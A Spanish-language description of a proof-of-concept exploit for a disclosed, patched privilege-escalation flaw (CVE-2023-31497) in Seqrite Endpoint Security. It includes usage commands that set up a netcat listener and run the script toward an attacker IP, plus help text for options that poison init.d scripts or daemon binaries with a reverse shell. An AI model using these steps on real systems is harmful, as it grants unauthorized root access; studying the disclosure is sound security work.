
Exploit para la vulnerabilidad de elevación de privilegios en Seqrite EPS de QuickHeal (CVE-2023-31497).
Una vulnerabilidad de elevación de privilegios en la solución Seqrite Enterprise Endpoint Security (EPS) de QuickHeal. A la vulnerabilidad se le ha asignado el ID de CVE: CVE-2023-31497.
La seguridad de endpoints de Seqrite, con su instalación predeterminada, se instala en /usr/lib/Seqrite/ con permisos de directorio y archivo muy débiles, otorgando a un usuario local permisos completos de lectura/escritura sobre el contenido del directorio. Además, el procedimiento de instalación coloca sus scripts de inicio en /etc/init.d/, los cuales son escribibles por cualquier usuario. Esto permite que cualquier usuario con pocos privilegios en el sistema pueda escalar privilegios a root.
El exploit aprovecha 2 vulnerabilidades diferentes introducidas por el software para elevar privilegios en el sistema. En primer lugar, el hecho de que la aplicación utiliza scripts en /etc/init.d/ para iniciar sus procesos de escaneo, los cuales pueden ser escritos por cualquier usuario. En segundo lugar, la aplicación utiliza objetos compartidos para cargar dinámicamente código independiente de la posición (PIC) durante la ejecución. De hecho, todos los archivos ejecutables de objetos compartidos son escribibles por cualquier usuario. Por último, los binarios de la aplicación utilizados para el proceso demonio son escribibles por cualquier usuario, lo que básicamente significa que cualquier usuario no privilegiado podría sobrescribir los binarios del escáner con un binario de reverse shell para ejecutar código arbitrario como root.
El exploit es un simple archivo Python que ayuda en la explotación de la vulnerabilidad.
Pasos:
nc -lvp <port>) o metasploit (multi/handler).epscalate.py y shellcode.c en el sistema objetivo.python3 epscalate.py -H 192.168.0.103:9999 -I).Ayuda del exploit:
$ python epscalate.py -h
EPSCALATE - PoC for privesc in Seqrite EPS
~ 0xInfection
usage: epscalate.py -H <host>:<port> <technique_flag>
options:
-h, --help show this help message and exit
-H HOSTPORT, --hostport HOSTPORT
The IP and port of the listening attacker machine in format of <ip>:<port>
-B, --daemon-binaries
Overwrite the main daemon binaries to escalate privileges.
-I, --initd-scripts Posion /etc/init.d/ bash startup scripts with a reverse shell to escalate privileges.
El exploit ha sido probado en todos los sistemas operativos basados en Debian y Ubuntu.
El código del exploit se ha publicado bajo la Licencia Apache 2.0. La vulnerabilidad ha sido divulgada al proveedor y ha sido solucionada en el momento de la publicación de la vulnerabilidad.
Créditos de la vulnerabilidad y el exploit: Pinaki Mondal (0xInfection).